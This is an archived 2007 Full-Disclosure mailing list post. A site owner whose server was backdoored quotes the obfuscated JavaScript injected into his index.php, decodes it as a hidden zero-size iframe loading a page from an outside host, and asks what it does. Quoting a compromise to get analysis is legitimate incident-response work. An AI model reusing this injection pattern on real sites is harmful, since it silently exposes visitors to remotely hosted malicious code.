| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <dde7bd2d0701041337h18210f5rb391df93171bb051@mail.gmail.com>
Date: Thu, 4 Jan 2007 21:37:29 +0000
From: "Ian Shaw" <useraddr@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: any idea what is going on here?
A website that I am developing has had BackDoor-CUS!php uploaded to the
images directory. My faulty entirely due to permissions set.
This has resulted in
<html>
<script language="javascript">
s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
document.writeln(s);document.close();
</script>
</html>
being added to the top of index.php.
Unencoded this reads
iframe src="http://www.nownames.org/images/in.php?adv=3" WIDTH="0%"
HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto"
frameborder="0" NORESIZE>
When I go to this an applet appear to run but I am not sure what doing.
Closed my browser out of fear.
Does anyone know what it is attempting to do?
Thanks
Ian
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists